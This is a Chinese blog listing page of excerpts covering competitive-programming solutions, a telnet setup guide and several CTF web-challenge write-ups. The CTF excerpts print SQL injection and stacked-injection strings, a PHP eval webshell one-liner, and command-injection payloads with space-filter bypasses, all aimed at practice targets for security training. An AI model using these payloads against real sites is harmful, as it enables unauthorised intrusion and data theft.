p5322 2019 bjoi

[十二省联考 2019] 字符串问题 题意很唬人，实际上就是让你建出一个二分图模型，然后求点权和最大的路径，其中 \(B_i\) 要向所有满足 \(B_i\) 是 \(A_j\) 的前缀的 \(A_j\) 连边。直接连边是 \(O(n^2)\) 的。考虑优化，不难想到 SA 的优良性质，即 \(B_ ......

题目附件如下。 <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Upload</title> <form action=\"\" ......

题目给出了源码，如下。 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <met ......

[十二省联考 2019] 春节十二响 感觉作为例题还是挺不错的。 感官上直接分析比较困难。不妨先考虑怎样的段长集合是合法的。 注意到合法等价于对每一条从根到叶子的链都合法，考虑在链上贪心，尝试将每个和比他大的最小的点做匹配，如果能匹配上就是合法。很显然，如果仅考虑一条链，那么极小的一个合法段长集合就 ......

打开题目，得到一段源码，如下。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r') "wel ......

如何在 Windows Server 2019 中启用 Telnet 客户端这篇文章将介绍如何在 Microsoft 的 Windows Server 2019 中安装 telnet 客户端。 启用 Telnet 客户端首先，我们需要启用 telnet 客户端，如果我们不启用它，我们将在尝试使用它时 ......

相信大家都看过题，但还请搞清楚是数对应结点编号。这里用 \(a_i\) 表示 \(i\) 号结点对应的数。 对于 \(n\leq 10\) 的数据，全排列出删边的顺序然后模拟，取字典序最小的方案。 对于菊花，仍然考虑删边的顺序，假设删边依次是 \(rt\to v_1,rt\to v_2,\cdots ......

考虑一个结点在什么情况下会成为重心。 随便钦定一个根结点。对于结点 \(u\)，假设割掉了其子树 \(v\) 中的某条边或连接 \(u\) 和 \(v\) 的边，形成了一棵大小为 \(k\) 的新树。 令 \(mx\) 表示除 \(v\) 子树外最大的子树大小（或 \(n-siz_u\)）。如果 \ ......

[Cnoi2019] 青染之心 题目描述： Cirno初始有一个空的物品序列，一个大小为 \(V\) 的背包，现在你有 \(q\) 个操作，分为两种： add x y : 表示加入一种体积为 \(x\), 价值为 \(y\) 的物品到序列末尾 erase : 表示删除序列末尾的物品 对于每个操作结束 ......

打开题目，输入：11';show databases;# 后可以发现是堆叠注入。 输入：11';show tables;#。 查看 1919810931114514 表中有什么字段：11';show columns from 1919810931114514;#。 查看 words 表中有什么字段： ......

题目提示如下。 猜测后台语句是设置为仅在用户输入与 flag 完全一致时才输出 flag。 尝试输入：1;show databases;#，发现存在堆叠注入。 输入：1;show tables;#，获取当前存在的数据表。 尝试输入：1;show columns from Flag;#，经过对比，发现 ......

访问靶场，是一个登录框，直接尝试万能密码：admin' or 1=1;# 即可获得 flag。 ......

访问网站如下。 在网页源代码中有提示。 <!-- $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } --> Payload：/?cat=dog。 ......

打开题目如下。 直接使用万能密码即可登录，但未拿到 flag。 这里尝试联合注入，首先确定字段数量，Payload：admin' or 1=1 order by 1;#，当字段数为 4 时报错，因此字段数为 3。 接下来判断什么位置的字段会输出：admin' union select 1,2,3;# ......

打开网页如下。 查看页面源代码，发现存在 Secret.php 页面。 <h2>小组简介</h2> <p>·成立时间：2005年3月 ·研究领域：渗透测试、逆向工程、密码学、IoT硬件安全、移动安全、安全编程、二进制漏洞挖掘利用等安全技术 ·小组的愿望：致力于成为国内实力强劲和拥有广泛影响力的安全研 ......

题目访问如下。 直接使用 antsword 连接即可。 ......

打开题目后发现是一道上传题，如下。 随便上传个 .jpg 结尾的小马上去，提示：NO! HACKER! your file included '<?'。 <?php @eval($_POST['cmd']); ?> 因此使用其他方式替换掉 <?。 <script language="php">@ev ......

打开题目如下。 尝试输入：admin' or 1=1;#，发现 or 被过滤了。 尝试双写绕过：admin' oorr 1=1;#，成功登录。 接下来是与 **[极客大挑战 2019]LoveSQL **类似的，只是多使用了一个双写绕过而已。 ......

访问题目后存在提示。 随后输入：/?ip=1;ls 即可看到当前目录下存在 flag.php 文件。 这里尝试使用 Payload：/?ip=1;cat flag.php 得到如下。 这里尝试使用：${IFS}、{IFS}$9、$IFS$9 来绕过空格过滤，发现程序也检测了 {、} 符号，因此使用 ......

打开题目如下。 查看页面源代码，发现存在 Archive_room.php 文件。 访问 Archive_room.php 文件如下。 使用 BurpSuite 抓包，点击 SECRET 后，发现其中某个跳转的页面源代码存在提示 secr3t.php。 HTTP/1.1 302 Found Serv ......

题目链接 观察题目，我们发现直接计算是困难的，先构造单个合法的 \(T\) 分析其性质。 为了构造出 \(T\)，先考虑构造时 \(T\) 时什么时候会出现不合法的情况，此时 \(T\) 会有一段和 \(S\) 相同的前缀，且这段前缀后面跟着的字符比 \(S\) 所跟的小。 为了避免这种情况出现，我 ......

题目一打开，是一个计算器。 主页源代码如下，这里可以看到有一个 calc.php 文件，并且提示存在 WAF（疑）。 <!--I've set up WAF to ensure security.--> <script> $('#calc').submit(function(){ $.ajax({ ......

打开网页，发现右手边的菜单中有个 PAYFLAG，打开后跳转到 pay.php 中，其中网页源代码有提示，主要内容如下： If you want to buy the FLAG: You must be a student from CUIT!!! You must be answer the co ......

打开靶机页面后发现有提示：因为每次猫猫都在我键盘上乱跳，所以我有一个良好的备份网站的习惯。结合常用的备份字典，直接扫到存在 www.zip 文件，下载后解压打开，发现源码。 在 index.php 中，关键代码如下： <?php include 'class.php'; $select = $_GE ......

打开靶机页面后发现有提示：因为每次猫猫都在我键盘上乱跳，所以我有一个良好的备份网站的习惯。结合常用的备份字典，直接扫到存在 www.zip 文件，下载后解压打开，发现源码。 在 index.php 中，关键代码如下： <?php include 'class.php'; $select = $_GE ......

[安洵杯 2019]吹着贝斯扫二维码 压缩包里面有个flag.zip文件，但是有密码无法打开 并且注释信息里有一串字符GNATOMJVIQZUKNJXGRCTGNRTGI3EMNZTGNBTKRJWGI2UIMRRGNBDEQZWGI3DKMSFGNCDMRJTII3TMNBQGM4TERRTGEZ ......

洛谷传送门 AtCoder 传送门 神题。 设第 \(i\) 个箱子有 \(x_i\) 个红球，\(y_i\) 个蓝球，那么要求找到最大的 \(K\) 使得 \(\sum\limits_{i = 1}^K x_i \le R, \sum\limits_{i = 1}^K y_i \le B\)，且 ......

非常好题目。DP 强行优化 \(O(n^3)\to O(n\log^2n)\)。实际上是把 \(O(nr)\) 和 \(O(nk)\) 的两个 Subtask 结合起来得到正解。 3 ......

【安洵杯 2019】easy_serialize_php 收获 php反序列化逃逸 数组变量覆盖 POST请求体传递数组 分析 代码： <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','f ......

本文记录了我通过VS2019编译MicroSIP-3.21.3开源项目的过程。 Microsip:MicroSIP source code pjproject:Download PJSIP - Open Source SIP, Media, and NAT Traversal library opu ......